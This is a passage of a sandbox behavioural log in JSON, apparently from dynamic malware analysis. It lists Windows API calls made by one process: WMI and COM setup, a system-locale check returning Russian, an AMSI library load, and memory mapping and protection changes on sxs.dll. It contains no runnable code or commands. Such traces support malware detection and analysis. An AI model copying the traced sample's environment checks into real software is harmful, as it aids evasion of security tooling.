          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x14004e41b",
            "parentcaller": "0x140036c64",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002bc"
              }
            ],
            "repeated": 0,
            "id": 667
          },
          {
            "timestamp": "2025-11-20 10:58:28,437",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x14008a293",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x053f8000"
              },
              {
                "name": "RegionSize",
                "value": "0x00009000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 668
          },
          {
            "timestamp": "2025-11-20 10:58:29,453",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\clbcatq"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee2c20000"
              }
            ],
            "repeated": 0,
            "id": 669
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wbemcomn"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed95e0000"
              }
            ],
            "repeated": 0,
            "id": 670
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wbemdisp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed9590000"
              }
            ],
            "repeated": 0,
            "id": 671
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "API-MS-Win-Core-LocalRegistry-L1-1-0.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1090000"
              }
            ],
            "repeated": 0,
            "id": 672
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed9590000"
              }
            ],
            "repeated": 0,
            "id": 673
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoGetClassObject",
            "status": false,
            "return": "0xffffffff80040154",
            "arguments": [
              {
                "name": "rclsid",
                "value": "172BDDF8-CEEA-11D1-8B05-00600806D9B6"
              },
              {
                "name": "ClsContext",
                "value": "0x00000417",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "0000011A-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": "WINMGMTS.1"
              }
            ],
            "repeated": 0,
            "id": 674
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\advapi32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2b50000"
              }
            ],
            "repeated": 0,
            "id": 675
          },
          {
            "timestamp": "2025-11-20 10:58:29,469",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "172BDDF8-CEEA-11D1-8B05-00600806D9B6"
              },
              {
                "name": "ClsContext",
                "value": "0x00000417",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "0000011A-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": "WINMGMTS.1"
              }
            ],
            "repeated": 0,
            "id": 676
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wbemprox"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc850000"
              }
            ],
            "repeated": 0,
            "id": 677
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemprox.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc850000"
              }
            ],
            "repeated": 0,
            "id": 678
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F811-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "DC12A687-737F-11CF-884D-00AA004B2E24"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 679
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wmiutils"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc210000"
              }
            ],
            "repeated": 0,
            "id": 680
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wmiutils.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc210000"
              }
            ],
            "repeated": 0,
            "id": 681
          },
          {
            "timestamp": "2025-11-20 10:58:29,484",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 4,
            "id": 682
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "threading",
            "api": "NtCreateThreadEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000318"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartAddress",
                "value": "0x7ffee2fe2d30"
              },
              {
                "name": "Parameter",
                "value": "0x008ce190"
              },
              {
                "name": "CreateFlags",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "2432"
              },
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "Module",
                "value": "combase.dll"
              }
            ],
            "repeated": 0,
            "id": 683
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "2432",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00920000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 684
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "2432",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 685
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00923000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 686
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "1596",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 687
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "1596",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000334"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 688
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00924000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 689
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 1,
            "id": 690
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "3408",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00929000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 691
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "3408",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000348"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 692
          },
          {
            "timestamp": "2025-11-20 10:58:29,500",
            "thread_id": "3408",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0092b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 693
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "0000032A-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000149-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 694
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000339-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 695
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wbemsvc"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed94f0000"
              }
            ],
            "repeated": 0,
            "id": 696
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemsvc.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed94f0000"
              }
            ],
            "repeated": 0,
            "id": 697
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 1,
            "id": 698
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "api-ms-win-core-localization-l1-2-0.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1090000"
              }
            ],
            "repeated": 0,
            "id": 699
          },
          {
            "timestamp": "2025-11-20 10:58:29,531",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "api-ms-win-core-localization-obsolete-l1-1-0.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1090000"
              }
            ],
            "repeated": 0,
            "id": 700
          },
          {
            "timestamp": "2025-11-20 10:58:29,594",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\fastprox"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed3fc0000"
              }
            ],
            "repeated": 0,
            "id": 701
          },
          {
            "timestamp": "2025-11-20 10:58:29,594",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 2,
            "id": 702
          },
          {
            "timestamp": "2025-11-20 10:58:29,719",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\fastprox.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed3fc0000"
              }
            ],
            "repeated": 0,
            "id": 703
          },
          {
            "timestamp": "2025-11-20 10:58:29,719",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\amsi"
              },
              {
                "name": "DllBase",
                "value": "0x7ffede1c0000"
              }
            ],
            "repeated": 0,
            "id": 704
          },
          {
            "timestamp": "2025-11-20 10:58:29,719",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "amsi.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffede1c0000"
              }
            ],
            "repeated": 0,
            "id": 705
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 706
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x1400825fa",
            "parentcaller": "0x140089aa8",
            "category": "com",
            "api": "CoGetObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Name",
                "value": "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"
              },
              {
                "name": "riid",
                "value": "00020400-0000-0000-C000-000000000046"
              }
            ],
            "repeated": 0,
            "id": 707
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 0,
            "id": 708
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 709
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "sxs.dll"
              }
            ],
            "repeated": 0,
            "id": 710
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\sxs.dll"
              }
            ],
            "repeated": 0,
            "id": 711
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000035c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\sxs.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 712
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000360"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x0000035c"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\sxs.dll"
              }
            ],
            "repeated": 0,
            "id": 713
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000360"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee08c0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x000a2000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 714
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee095d000"
              },
              {
                "name": "ModuleName",
                "value": "sxs.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 715
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee093a000"
              },
              {
                "name": "ModuleName",
                "value": "sxs.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 716
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000360"
              }
            ],
            "repeated": 0,
            "id": 717
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000035c"
              }
            ],
            "repeated": 0,
            "id": 718
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee093a000"
              },
              {
                "name": "ModuleName",
                "value": "sxs.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 719
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
